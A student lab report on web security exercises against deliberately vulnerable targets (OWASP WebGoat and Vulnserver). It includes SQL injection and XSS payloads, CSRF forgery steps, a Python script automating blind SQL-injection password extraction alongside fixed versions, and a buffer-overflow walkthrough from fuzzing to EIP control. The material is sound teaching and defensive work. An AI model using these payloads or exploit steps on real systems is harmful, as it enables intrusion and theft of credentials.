This report describes the web security project and the software it uses, how that software protects the computer from harmful applications and from being attacked, and then presents the working plan.
The project is about web security: how an attacker attacks a victim and how to secure the web application against that attack. The report covers the most popular attack types and goes into detail for some of them.
System overview of the web security project and the software
In this project, different software will be used. The operating systems are Ubuntu Linux 18.04, Windows 10 and Kali Linux. WebGoat will be used as the website and web server against which the ethical-hacking attacks are launched. All of these systems run as virtual machines in VirtualBox for safety and isolation.
Description of software:
VirtualBox: is open source virtualization software from Oracle. It runs guest operating systems as virtual machines inside the host machine, so one host can run Ubuntu, Kali Linux, Windows and so on at the same time. For my project, I will be using VirtualBox to increase safety. One of its features is the internal network: the virtual machines can talk only to each other, isolated from the host's internet connection, or be connected to the internet through the host when needed. This project needs the internal network so that the attacks against WebGoat stay inside the lab and never reach the real network. For installation, see Appendix 1.
Ubuntu: is an open source Linux distribution. Ubuntu 18.04 hosts WebGoat, so it is both the web server and the victim of the attacks. Ubuntu was chosen because it is light on the host machine and because Burp Suite, the tool used to test web application security, runs well on it. Burp Suite is not part of a default Ubuntu install and has to be installed separately. For installation, see Appendix 2.
Kali: is an open source Linux distribution built for penetration testing and security analysis. It ships with the tools used in this project, such as Metasploit, so it is the attacker machine here. Seeing the attack from the attacker's point of view is what shows how to stop it, which is why ethical hackers like to use Kali for testing and for rating network security. For installation, see Appendix 3.
WebGoat: is an open source, deliberately insecure web application maintained by OWASP for learning and testing web security. Its lessons teach how attacks work and how to avoid being hacked. WebGoat will be used in this project as the target for carrying out the tests. WebGoat 8 comes with an embedded web server, so there is no need to install a separate server such as Tomcat alongside it. For installation, see Appendix 6.
Burp Suite: is a tool to test the security of web sites and web applications. It comes in several editions: the Professional and Enterprise editions are paid (with a free trial), and the Community edition is free but does not have all the functions of the paid editions. The Community edition provides the basic functionality used here, for example the intercepting HTTP proxy, Repeater and a rate-limited Intruder; the automated Scanner is only in the paid editions.
Types of attacks:
SQL injection attack: There are many types of SQL injection. SQL injection exploits a weakness in the way an application builds its database queries: when user input is concatenated into the SQL text without escaping and without being bound as a typed parameter, the input can change the meaning of the query, so the result is no longer what the developer intended.
XSS: It stands for cross-site scripting. This type of attack is typically found in web applications. XSS allows the attacker to inject client-side script into web pages that are shown to other users; in other words, the attacker adds code to pages viewed by normal users. It is usually found on websites that render user-supplied data as HTML without encoding it. Attackers who exploit XSS often use it to act as the victim inside the application, for example stealing the session cookie or performing actions that bypass access control with the victim's privileges.
DoS attack: DoS stands for denial of service. The attacker floods a server with traffic or requests so that it can no longer serve legitimate users. When the traffic comes from many computers or sources at the same time it is called a distributed denial of service (DDoS). Many websites have been taken offline by this attack: the site's bandwidth or processing capacity is used up, the site stops responding and visitors cannot see it.
CSRF: It stands for cross-site request forgery, also known as a one-click attack. Like XSS it abuses the trust between a browser and a web application, but the difference is that CSRF does not need script injected into the site: the attacker tricks the victim's browser into sending a request to the application while the victim is logged in, and the browser automatically attaches the session cookie. The attacker cannot read the victim's cookies this way, but can make the application perform state-changing actions as the victim, such as modifying data in a control panel, sending e-cards or placing an order.
Buffer overflow: It happens when a program writes more data into a buffer than the buffer can hold, so the extra data overwrites adjacent memory. It is usually the result of not checking the length of user input before copying it into a fixed-size buffer. A simpler picture of this situation is a glass of water: once the glass is full, any more water spills out over whatever is next to it.
Web authentication hacking: There are different types of web authentication. WebGoat has two of them, and there is another one with HTTP login authentication; this project will cover them in detail.
Project plan (Microsoft Project)
To plan the project, I used Microsoft Project to create a schedule with dates and tasks: what will be done on each date, how long each task will take and how many hours are worked each day. The project starts on 4 February with the preliminary report, and my plan runs from that day until 1 May.
For more details, see Appendix 5.
Work to date:
SQL-injection (advanced) part 3
In this part, I am trying to get all the database information by injecting into the database in WebGoat:
First, try to pull normal data with my user name, which is (Talal); there was no matching result, as figure 1 shows.
Then, try the single quote (') mark; the result is figure 2.
Finally, attack by entering the following in the name field:
talal'; select * from user_system_data;--
After typing this in the name field and clicking the Get Account Info button, every row of the table is shown, as in figure 3.
Then, try one of the passwords in the password field; the result is in figure 4. It works successfully.
SQL-injection (advanced) part 5
In this part, the goal is to log in as Tom by injecting into the database and finding the password of the Tom user. Figure 5 shows the page before starting. In this part the error message (or its absence) is used to guide the way to Tom's password. The system does not give all the information; it has to be worked out by asking the system a series of questions, and the system answers each one with a true or false response (blind, boolean-based SQL injection).
Start by guessing a random password for user Tom, for example (a). The result is shown in figure 6.
There is a registration module that can register a new user, and its form can be used to ask the series of questions. The register form is shown in figure 7.
Now I will try to register myself and see the registration process. After registering, the success message in figure 8 is shown.
So, I register myself to make sure the new account is in the database, and start the true/false exchange with the server using the new account, whose password is known; then the same technique is used to guess Tom's password.
After making sure the new account is in the WebGoat database, run a query to check the password of the new account. In figure 9 the true message is shown, which means the user exists. The query in figure 9 checks the length of the password.
Then, check which letter is first, and so on. For the test account there is only one letter, which is (a); write the query that checks whether that letter is correct by doing the true/false exchange with the server.
Figure 10 shows that (a) is the first character of the test account's password.
Now find the number of characters in Tom's password so the guessing can start. This step is the same as figure 9; it uses the query
tom' and length(password)=1 --
This is shown in figure 11. Then increase the number in the query until the true message appears; the result is that Tom's password has 23 characters. In the left picture the length is narrowed down with > and <: the numbers tried were 1, 5, 10, 15, 20 and 25. At 25 the true message appeared, so the number was reduced to 24 and then 23, and the query with 23 gave the true message. So Tom's password is 23 characters.
For an unknown password it takes too much time to try every letter of the alphabet one by one, so a query is used that halves the remaining alphabet on each guess (a binary search), written as in figure 12. In figure 12 the guessing of Tom's password starts with the first character, and so on. The query in figure 12 is false, which means that (a) is not the first letter of the password.
The algorithm for recovering the password with these queries is shown in figure 13.
The first character of Tom's password is found to be (t), so move to the second character by changing the query from
tom' and substring(password,1,1)='t' --
to
tom' and substring(password,2,1)='t' --
as shown in figure 14.
After going through all the characters, Tom's password is found to be (thisisasecretfortomonly), that is, "This is a secret for tom only" without spaces.
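The blind, boolean-based technique above, as an added Python example that is not part of the report or of WebGoat. It builds a constructed in-memory SQLite table (the table name, column names, sample rows and the alphabet are assumptions, not WebGoat's real schema or data) with a deliberately vulnerable lookup that only answers true or false, then recovers the password with the length probe of figure 11 and the alphabet-halving search of figures 12 and 13. The parameterized version at the end shows the fix.

```python
import sqlite3

# Constructed sample rows (assumption: not WebGoat's real data).
CONSTRUCTED_ROWS = [
    ("talal", "a"),
    ("tom", "thisisasecretfortomonly"),
]

# Byte-order sorted so that a > comparison halves the search space correctly.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?)", CONSTRUCTED_ROWS)
    return conn


def vulnerable_user_exists(conn, username):
    """Vulnerable lookup: the form's username is concatenated into the SQL.
    It only reports whether a row matched, which is the blind true/false oracle."""
    sql = "SELECT 1 FROM user_data WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # WebGoat shows an error here; treat it as a false answer


def oracle(conn, target, condition):
    """One yes/no question of the form  tom' and <condition>--"""
    return vulnerable_user_exists(conn, f"{target}' and {condition}--")


def find_length(conn, target, upper=64):
    """Figure 11: narrow length(password) down with > comparisons."""
    lo, hi = 1, upper
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, target, f"length(password)>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(conn, target, pos):
    """Figures 12-13: halve the alphabet with substr(password,pos,1) > 'x'."""
    lo, hi = 0, len(ALPHABET) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, target, f"substr(password,{pos},1)>'{ALPHABET[mid]}'"):
            lo = mid + 1
        else:
            hi = mid
    return ALPHABET[lo]


def recover_password(conn, target):
    n = find_length(conn, target)
    return "".join(find_char(conn, target, i) for i in range(1, n + 1))


def safe_user_exists(conn, username):
    """Fixed lookup: the username is bound as a parameter, so the quote and the
    appended condition are just characters of a name that does not exist."""
    row = conn.execute(
        "SELECT 1 FROM user_data WHERE username = ?", (username,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("length:", find_length(db, "tom"))
    print("password:", recover_password(db, "tom"))
    print("injected name against fixed lookup:", safe_user_exists(db, "tom' and 1=1--"))
```

Each oracle call is one request in WebGoat; the length takes about six questions and each character about six more, so 23 characters cost roughly 150 requests instead of 23 × 36 linear guesses.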
SQL
injection:
In this part, I try to get all the database information by injecting into the database in WebGoat. There are two cases: the first when the data type is a string, the second when the data type is numeric.
String SQL injection:
Figure 16 shows the WebGoat page before injecting.
Try to find the weakness of this database by entering a name that is not in the database, for example (talal). The result is shown in figure 17.
Then, try a name that is in the database, for example (Smith); the result was as expected, as figure 18 shows.
In this step, try the single quote ('); the result is as figure 19 shows.
That malformed-query error indicates that SQL injection is possible. The injection forces the WHERE condition to be true by entering (' OR '1'='1) in the string field: the first quote closes the string and the rest appends a comparison that is always true. After the true statement is injected, SQL returns the result shown in figure 20.
In figure 20, the SQL injection succeeded and returned the whole table.
Numeric SQL injection:
In this type of injection the previous payload does not work, because the value is numeric and is not wrapped in quotes, so there is no quote to close; the always-true condition has to be written for a numeric context.
Figure 21 shows the WebGoat page before the injection.
Figure 22 tries an existing value, and the result shows the data related to it.
To make the condition true, append (OR TRUE) to the numeric value (OR 1=1 is equivalent); the query then returns the whole table.
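The string and numeric cases above side by side with their fix, as an added Python example that is not part of the report or of WebGoat. The employee table and its rows are constructed for the example (an assumption, not WebGoat's data); the vulnerable functions build the query by concatenation exactly as the lesson's page does, and the safe functions bind the value as a parameter, which is the standard remediation.

```python
import sqlite3

# Constructed sample rows (assumption: not WebGoat's real employee data).
CONSTRUCTED_EMPLOYEES = [
    (101, "Smith", "John", "IT"),
    (102, "Jones", "Mary", "Sales"),
    (103, "Brown", "Sam", "HR"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (userid INTEGER, last_name TEXT, first_name TEXT, department TEXT)"
    )
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?, ?)", CONSTRUCTED_EMPLOYEES)
    return conn


def string_lookup_vulnerable(conn, last_name):
    """Figures 16-20: the name is quoted and concatenated into the SQL text,
    so  ' OR '1'='1  closes the string and makes the WHERE clause always true."""
    sql = "SELECT * FROM employees WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def numeric_lookup_vulnerable(conn, userid):
    """Figures 21-22: a numeric value is not quoted, so there is no quote to
    close;  101 OR 1=1  (WebGoat: OR TRUE) is appended directly."""
    sql = "SELECT * FROM employees WHERE userid = " + str(userid)
    return conn.execute(sql).fetchall()


def probe_single_quote(conn):
    """Figure 19: a lone quote leaves the statement malformed and the
    database reports a syntax error, the tell-tale sign of injectability."""
    try:
        string_lookup_vulnerable(conn, "'")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def string_lookup_safe(conn, last_name):
    """Fix: a bound parameter is always data, never SQL syntax."""
    return conn.execute(
        "SELECT * FROM employees WHERE last_name = ?", (last_name,)
    ).fetchall()


def numeric_lookup_safe(conn, userid):
    """Fix: convert to int first (rejects '101 OR 1=1') and bind the value."""
    return conn.execute(
        "SELECT * FROM employees WHERE userid = ?", (int(userid),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("probe:", probe_single_quote(db))
    print("string injection rows:", len(string_lookup_vulnerable(db, "' OR '1'='1")))
    print("numeric injection rows:", len(numeric_lookup_vulnerable(db, "101 OR 1=1")))
    print("same input, safe query rows:", len(string_lookup_safe(db, "' OR '1'='1")))
```

Note that the parameterized numeric lookup fails loudly on `101 OR 1=1` (int() raises ValueError), which is the right behaviour: a numeric field should never accept anything but a number.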
Real world examples of SQL injection
“In July 2012 a hacker group was reported to have stolen 450,000 login
credentials from Yahoo!. The logins were stored in plain text and were
allegedly taken from a Yahoo subdomain, Yahoo! Voices. The group breached
Yahoo's security by using a (union-based SQL injection technique)”. (Treybig, 2017)
On March 7, 2014, officials at Johns Hopkins University publicly
announced that their Biomedical Engineering Servers had become victim to an SQL
injection attack carried out by an Anonymous hacker named "Hooky" and
aligned with hacktivist group "RaptorSwag". The hackers compromised
personal details of 878 students and staff, posting a press release and the
leaked data on the internet. (Komodo, 2015)
In May 2012, the website for Wurm Online, a massively multiplayer online game, was shut down because of an SQL injection while the site was being updated (Richards, T. 2017).
XSS:
Reflected XSS
Reflected cross-site scripting (XSS) happens when script supplied in a request is echoed back by the server, unencoded, within the same HTTP response, and the browser executes it.
In this task, WebGoat requires finding the field that accepts the XSS payload. The WebGoat page is shown in figure 24.
Figure 24 shows the shopping cart form; it has 6 fields in which JavaScript code could be entered. After trying all of them, the field that reflects the input is the credit card field, as shown in figure 25.
There is a good reason to choose the credit card field: it accepts a long value that is not restricted to a few digits and allows spaces, so the script has room to fit. To do the reflected XSS attack, type the script in the credit card field and click the Update Cart button; the reflected XSS fires and the success message is shown.
Identify potential for DOM-based XSS
DOM-based XSS modifies the DOM environment in the victim's browser so that the page's original client-side script runs in an unexpected way.
To do this task, click the submit button; the message in figure 26 says to check the GoatRouter.js file.
From the URL it can be discovered how WebGoat routes its pages. For example, the WebGoat URL is localhost:8080/WebGoat/start.mvc#lesson..., so the base route of this page is start.mvc#lesson. To find the attack route, right-click and open the browser inspector, then go to the debugger tab. From the sources, find WebGoat.js and click on it to show the source as in figure 27. Inside WebGoat.js there are many files; the important one is called goatApp, inside it there is a folder called view, and inside that GoatRouter.js. Clicking on GoatRouter.js shows the code, and in that code the routes shown in figure 27 can be seen.
For this task, the route of the test page is start.mvc#test/
DOM-based XSS
This task is similar to the previous one, but the attack is delivered through the URL. Open a new tab in the browser and edit the URL by adding the script to the route. Before that, open the browser inspector and click on Console. Then in the URL bar type:
localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();<%2Fscript>
The slash of the closing tag is written as %2F so that the router does not treat it as a path separator.
When Enter is hit, the page changes and the word test appears on the blank page, as shown in figure 28. The console shows that the phone-home script ran and gives the response number.
Phone home function XSS attack
In this task the phone-home function is used on the comment page. First post a normal comment, as shown in figure 29, then post the phone-home script. The script used is:
<embed src="javascript:webgoat.customjs.phoneHome();">
Type the script in the comment field and hit Enter, but before that open the console to see the result of the attack (the response).
After opening the console and hitting Enter, the response is shown in figure 30: the phone-home function responds with a number, and that number is the answer for WebGoat.
Defence against XSS attacks
There are three ways to stop XSS attacks on a website or application.
Escaping:
The first way to stop XSS on a website or application is to escape user input. Escaping data means taking the data the website or application has received and encoding it so that the browser treats it as text and not as markup. Characters such as (<), (>), (&), quotes and (/) are converted to their HTML entities when the data is placed into a page; users should not be able to add raw HTML, URL or JavaScript content. (Vonnegut, 2017)
Validating input:
The second way is validating input, which is the process of making sure the website or app is rendering the correct data and blocking malicious data. Whitelisting and input validation are a common way to stop SQL injection, and they also work against XSS attacks. (Vonnegut, 2017)
Sanitizing:
The third way to block XSS attacks is to sanitize the inputs, that is, to strip or neutralise dangerous markup from data that must be accepted as HTML. Sanitizing inputs is a strong defence, but it should not be used alone to block XSS attacks; it needs the other methods with it. (Vonnegut, 2017)
The website or app needs all three methods to be protected from XSS attacks, because each one does a different job in blocking the script: escaping, validating input and sanitizing. (Vonnegut, 2017)
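The three defences above applied to the two WebGoat inputs from this section (the reflected credit card field and the comment field), as an added Python example that is not part of the report or of WebGoat. The field name, the allow-listed tags and the sample inputs are assumptions. The sanitizer here is a deliberately small allow-list pass to make the idea visible; a production application should use a maintained library for that step rather than a hand-written one.

```python
import html
import re

# Constructed inputs (assumption): a normal card number, the reflected
# payload from figure 25, and the phone-home comment from figure 30.
CONSTRUCTED_INPUTS = [
    "4128 3214 0002 1999",
    "<script>alert('xss')</script>",
    '<b onclick="steal()">nice</b><embed src="javascript:webgoat.customjs.phoneHome();">',
]

ALLOWED_TAGS = {"b", "i", "em", "strong", "p"}
TAG_RE = re.compile(r"<\s*(/?)\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def render_vulnerable(value):
    """Reflected XSS: the value is written straight into the HTML response."""
    return '<input name="creditCard" value="' + value + '">'


def render_escaped(value):
    """Escaping: encode <, >, &, " and ' so the browser sees text, not markup."""
    return '<input name="creditCard" value="' + html.escape(value, quote=True) + '">'


def validate_credit_card(value):
    """Validating input (allow-list): digits and spaces only, 13-19 digits.
    A script tag can never pass, regardless of how it is encoded later."""
    if not re.fullmatch(r"[0-9 ]+", value):
        return False
    return 13 <= len(value.replace(" ", "")) <= 19


def sanitize_comment(text):
    """Sanitizing: keep a few harmless tags with their attributes removed,
    drop every other tag (script, embed, img...) and encode the text between."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        closing, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            out.append(f"<{closing}{name}>")  # attributes such as onclick= are gone
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    for value in CONSTRUCTED_INPUTS:
        print("vulnerable :", render_vulnerable(value))
        print("escaped    :", render_escaped(value))
        print("valid card :", validate_credit_card(value))
        print("sanitized  :", sanitize_comment(value))
        print()
```

The escaped output for the figure 25 payload contains `&lt;script&gt;`, so the browser renders the tag as literal text; validation rejects it before it is stored; and the sanitizer removes the `<embed>` element while keeping the `<b>` formatting of the comment.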
CSRF
Cross-site request forgery, also called a one-click attack, is a type of website attack where unwanted commands are transmitted from a user that the web application trusts.
Basic GET CSRF
This task covers the basic CSRF attack with WebGoat. In this attack there is a button called Submit Query, shown in figure 30; clicking that button opens a new window, shown in figure 31.
Figure 31 shows that the new page has three lines: the first is the flag, and the flag is null; the second is success, and it is false, which means the CSRF attack has not happened; the third is the message.
To do the CSRF attack, copy the URL of the new page. In that URL the parameter csrf=false is written; editing it as shown in figure 32 performs the CSRF attack and returns the flag number.
GET CSRF
This WebGoat task is a simple review page, and the goal is to post a review as another person. To do that, create a button that launches the CSRF attack: write an HTML page whose form points at the WebGoat endpoint. Before writing the HTML, the request URL has to be captured so that the form can be linked to the WebGoat page, which allows a review to be posted as another person.
To get the request URL from WebGoat, open the page, right-click, open the browser inspector and choose the Network tab, as shown in figure 33.
Then, in the WebGoat page, send a test review so that the request appears in the Network tab, and then write the HTML; the code is shown in figure 34.
In the code, the form targets the WebGoat URL and has 3 inputs, because the request sends 3 fields: the review text, the number of stars and validateReq. validateReq is a value that can be read from the captured request in the inspector. Finally, add a submit button.
Run the HTML file that was made, as in figure 35.
After clicking that button, the new page shows true and the message that the submission was correctly sent from another site. That is shown in figure 36.
CSRF attack on APIs
This task is about posting a message to an endpoint using JSON data. To do that, the request URL and the JSON body are needed, and a new HTML page is created with them. The URL is obtained as in the previous task: send a test post while the browser inspector is open and take the URL from the Network tab. The HTML is a basic page with a title, a header and a button; when the button is clicked it launches the CSRF attack. The HTML code is shown in figure 37.
After clicking the button, a page comes up (see figure 38) with true, a message saying the CSRF attack happened, and the flag number.
Prevent CSRF attacks
There are two sides: the server side and the client side.
To prevent CSRF attacks on the server side, the owner of the server or website should move from relying only on the session-tracking cookie to session tokens that are dynamically generated and must be sent with each request, which makes it much harder for an attacker to abuse a client's session. (Dargin, 2017) Actions to prevent CSRF attacks include: using random anti-CSRF tokens, using the POST method in forms instead of GET, limiting the lifetime of authentication cookies, damage limitation, forcing the user to use your own form, and a labelling mechanism. (Gupta, 2016)
To prevent CSRF attacks on the client side, it is important to know what is needed to authenticate to a website, because that is what leaves you exposed. Actions to prevent CSRF attacks include: keep anti-virus updated, don't open emails while logged in to a bank site, always log off when you finish banking and don't just close the browser, don't save your banking username and password in the browser, disable scripting in your browser, and use two different browsers, one for banking and one for normal browsing. (Dargin, 2017)
Example of a CSRF attack:
While the client is logged in to a bank website and the session is active, the client receives an email with a link and is asked to click it. If the client clicks the link, a request (or script) is sent to the banking site that transfers funds from the client's account to the attacker's account. In this case, the attacker uses the client's login session, computer and IP address for the attack. (Dargin, 2017)
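The server-side defence above (a random token tied to the session, POST only, and an origin check) applied to the review endpoint from the GET CSRF task, as an added Python example that is not part of the report or of WebGoat. The request is modelled as a plain dictionary rather than a real framework, and the cookie name, site origin and form fields are assumptions. The simulated requests show why the attacker's page succeeds against the unprotected handler and fails against the protected one: the browser still attaches the cookie, but the attacker's site cannot read the token.

```python
import hashlib
import hmac
import secrets

SITE_ORIGIN = "http://localhost:8080"          # assumption: where WebGoat is served
SERVER_KEY = secrets.token_bytes(32)          # per-deployment secret, constructed here
SESSIONS = {}                                 # session id -> username


def login(username):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = username
    return sid


def csrf_token(session_id):
    """Synchronizer token bound to the session: HMAC(key, session id).
    Only the server can compute it and only this site's pages receive it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_review_form(session_id):
    """The legitimate form embeds the token in a hidden field."""
    return (
        '<form method="POST" action="/review">'
        f'<input type="hidden" name="csrf" value="{csrf_token(session_id)}">'
        '<input name="reviewText"><input name="stars"><button>Submit</button></form>'
    )


def handle_review_unprotected(request):
    """The lesson's behaviour: a valid cookie is all that is checked."""
    user = SESSIONS.get(request["cookies"].get("JSESSIONID"))
    if user is None:
        return 401, "not logged in"
    return 200, f"review by {user} accepted"


def handle_review(request):
    """Protected handler. request: dict with method, cookies, form, origin."""
    if request["method"] != "POST":
        return 405, "state-changing requests must use POST"
    sid = request["cookies"].get("JSESSIONID")
    user = SESSIONS.get(sid)
    if user is None:
        return 401, "not logged in"
    # Browsers set Origin on cross-site form posts and a page cannot forge it.
    if request.get("origin") not in (None, SITE_ORIGIN):
        return 403, "cross-site origin rejected"
    token = request["form"].get("csrf", "")
    if not hmac.compare_digest(token, csrf_token(sid)):
        return 403, "missing or invalid CSRF token"
    return 200, f"review by {user} accepted"


def legitimate_request(sid):
    return {"method": "POST", "cookies": {"JSESSIONID": sid}, "origin": SITE_ORIGIN,
            "form": {"csrf": csrf_token(sid), "reviewText": "good", "stars": "5"}}


def forged_request(sid, origin="http://attacker.example"):
    """What figure 34's page produces: the victim's cookie rides along, but the
    attacker's HTML has no way to learn the token."""
    return {"method": "POST", "cookies": {"JSESSIONID": sid}, "origin": origin,
            "form": {"reviewText": "posted as victim", "stars": "1"}}


if __name__ == "__main__":
    sid = login("talal")
    print(render_review_form(sid))
    print("unprotected, forged:", handle_review_unprotected(forged_request(sid)))
    print("protected, legitimate:", handle_review(legitimate_request(sid)))
    print("protected, forged:", handle_review(forged_request(sid)))
```

The token check alone is enough; the Origin check is a cheap second layer for clients that send the header, and a `SameSite` attribute on the session cookie would stop the browser attaching it to cross-site posts in the first place.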
Buffer overflows
Anatomy of memory:
Process memory is usually drawn with the kernel at the top and the text segment at the bottom. The kernel occupies the highest addresses (address bits mostly ones, 0xFFFF...), and the text segment, which is the read-only program code, occupies the lowest addresses (mostly zeros). The buffer overflow attack in this project happens on the stack, which lies below the kernel and grows downwards towards the heap.
Anatomy of the stack
Zooming in on the stack, the region of interest divides into 4 parts: ESP (extended stack pointer), the buffer space, the saved EBP (extended base pointer) and the saved EIP (extended instruction pointer), which is the return address.
ESP points to the top of the stack and the saved EBP and EIP sit at the base of the current frame. In normal use the buffer fills with characters towards higher addresses and the data stops before it reaches the saved EBP. In a buffer overflow attack, however, the data runs past the end of the buffer and over the saved EBP and EIP. EIP is the return address: when the function returns, the CPU jumps to whatever address is stored there, so the attacker overwrites it with an address pointing at instructions of the attacker's choosing. Those instructions are the malicious code that gives a reverse shell, which runs with the privileges of the exploited process (administrator in this walkthrough, so in effect root on the victim).
Steps to conduct a buffer overflow:
1. Spiking: a method used to find the vulnerable part (command) of the program. Once a vulnerable command is found, move to the next step.
2. Fuzzing: similar to spiking. Fuzzing sends increasingly large inputs to the program to see whether it can be broken; if it crashes, move to the next step.
3. Finding the offset: find at exactly which byte of the input the program breaks, i.e. how many bytes precede the saved return address, before moving to the next step.
4. Overwriting the EIP: at the offset found, overwrite the EIP (return address); this gives control of EIP.
5. Finding bad characters and the right module: identify which byte values corrupt the payload, and find a module without memory protections that contains a usable jump instruction; then move to the next step.
6. Generating shellcode: after step 5, generate the (malicious) shellcode that gives the reverse shell, and point EIP at it through the jump; then move to the next step.
7. Root: the reverse shell connects back with the privileges of the exploited process.
Tools for the buffer overflow:
1. Victim machine: Windows 10
2. Vulnerable software: Vulnserver
3. Attacker machine: Kali Linux
4. Debugger: Immunity Debugger
Buffer overflow walkthrough
Starting with spiking: after installing and setting up Windows 10 (appendix 1), install Vulnserver and Immunity Debugger in it (appendix 2). Then, in Windows 10, disable real-time protection, because otherwise Windows Defender blocks Vulnserver. Note: run all the programs as administrator.
For installing Kali Linux, see appendix 3. From the Kali command prompt, connect to Vulnserver to check that it is reachable. Note: by default Vulnserver listens on port 9999. Give both machines static addresses in the same subnet (the Windows machine is 209.165.201.18 here; Kali needs a different address in the same range) and put both on the VirtualBox internal network named "internet" (see appendix 4). Figure 1 shows the connection to the vulnerable server succeeding on the second try.
Moving on, type HELP in capitals to list the commands the vulnerable server accepts; the commands are shown in figure 2.
For spiking, each of the commands above is tried one at a time. For example, start with STATS: send it a large number of characters and see whether the buffer overflows. If the program crashes, STATS is vulnerable; if not, move on to the next command.
The tool used for spiking is called generic_send_tcp (from SPIKE); it is shown in figure 3.
To use generic_send_tcp, one needs to know the IP address, the port number, the spike script and the skip variables:
For the IP address, it is the 209.165.201.18 set above.
For the port number, the default is 9999.
For the spike script, a file called stats.spk was written; it is shown in figure 4.
For the skip variables, both are zero.
So, start with the STATS command in the first try, as shown in figure 5.
After hitting Enter, it starts running but nothing happens, which can be seen in Immunity Debugger, as in figure 6. In figure 6 the right side is Kali running the spike with the STATS command, and the left side is Immunity Debugger attached to the server, where nothing happened. Kill the spike with Ctrl+C to stop the attack; it is clear that STATS is not vulnerable.
After some research about which command would be vulnerable to spiking, I found TRUN.
So, for TRUN the script needs to change; the difference is shown in figure 7, saved as trun.spk.
Then, run the TRUN spike the same way as STATS, but with the different script file name.
This time there is an access violation while executing the TRUN script. Stop the attack by killing the script with Ctrl+C. Vulnserver crashed, which means the attack worked, and Immunity Debugger shows the overflow in the registers; more information can be read from figure 9. The first line shows that the TRUN command was sent with hundreds of A's, which filled the buffer and ran past it into EBP and EIP. This is clear because 41414141 in hex is AAAA, four bytes of 0x41 ('A'). So the overflow happened.
The next step is fuzzing. A Python script is written that performs the overflow and reports when Vulnserver crashes; since the first step showed that TRUN is the vulnerable command, it is used in the code shown in figure 10. The first line identifies the interpreter, Python; the second line imports sys and socket, and then the sleep function. The buffer is set to "A" multiplied by 100, which means that on each iteration the program adds 100 more A's. Then comes a while loop with a try block that connects and attempts the overflow: the first line inside the loop connects to Vulnserver (AF_INET means IPv4 and SOCK_STREAM means a TCP stream), then it sends the TRUN command plus the buffer, closes the connection and sleeps for one second. While the connection still succeeds it keeps sending larger buffers. When the connection fails, it prints "Fuzzing crashed" and the number of bytes sent.
Running that script gives the result shown in figure 11: it crashed at 2300 bytes. The script does not stop by itself at the moment of the crash, so it has to be stopped manually once the overflow occurs; because of that, the first try reported 5500 bytes, even though the overflow had not yet been caught reaching EBP and EIP. Repeating the step showed three crashes.
Now the offset needs to be found, that is, the position in the input at which EIP gets overwritten, because that is what needs to be controlled. The tool used for finding the offset is provided by the Metasploit framework and is called pattern_create; it runs on the Kali machine.
Run the tool from the terminal as shown in figure 12. It has the switch -l for length, set to 3000; 3000 is used because Vulnserver crashed at 2300 bytes, so 3000 is enough to be sure the buffer overflows.
After typing this in the Kali terminal and hitting Enter, it gives the result shown in figure 12. Copy the generated pattern and write Python code similar to the fuzzing script to send it to Vulnserver.
The Python code is in figure 13; it contains the 3000-byte pattern to be sent to Vulnserver. Sending it crashes Vulnserver, and EIP ends up holding four bytes of the pattern; then the Metasploit pattern tooling is used in a different way, with pattern_offset, to turn that value into the offset.
After running the Python code, Vulnserver crashed, and in the debugger the TRUN command with the cyclic pattern can be seen running across ESP; the target is EIP and the goal is to control its value. The EIP is 386F4337.
Using pattern_offset in the Kali terminal is shown in figure 15.
This time pattern_offset is run with the length switch 3000 and -q with the query value 386F4337. After hitting Enter it reports the offset: inside the 3000 bytes it found where those four bytes occur in the pattern. The result is an exact match at 2003 bytes. That is critical, because at 2003 bytes EIP can be controlled.
Now EIP will be overwritten. From pattern_offset the offset is 2003 bytes, meaning there are 2003 bytes before EIP, and EIP is four bytes long. Those four bytes will be overwritten.
To do that, the Python code is modified (or rewritten) to send 2003 A's followed by 4 B's for EIP. The code is shown in figure 16.
After running this code from Kali against Vulnserver, figure 17 shows EAX pointing at the TRUN string followed by A's, EBP holding A's as well, and finally EIP holding 42424242, which is BBBB in hex. So EIP is under control.
Now bad characters need to be found. This relates to generating shellcode: when generating shellcode one needs to know which byte values are safe for the shellcode and which are bad, and that can be done by sending every byte value from \x01 to \xff through the program and seeing whether any of them are mangled. By default the null byte \x00 is bad, because it terminates strings.
To do that, find a list of all the byte values online (from bulbsecurity.com) and copy it into the Python code shown in figure 18, deleting \x00 from the list.
After running that code, check the debugger: right-click ESP and choose Follow in Dump, then look at the hex dump window to see whether anything is out of place or missing, as shown in figure 19 after finding the missing characters.
Now the right module is required, which means looking for a DLL or similar inside the program that has no memory protections: no DEP, no ASLR, no SafeSEH and so on.
For that, a tool called mona (mona.py) is used with Immunity Debugger. It is downloaded from github.com and copied into the Immunity Debugger folder at C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands. Then, back in Immunity Debugger, type !mona modules in the bottom command bar, which opens the new window shown in figure 20.
The mona modules window shows the protection settings in a table. Look for a module belonging to Vulnserver; that is the second line, and every protection on that line is false.
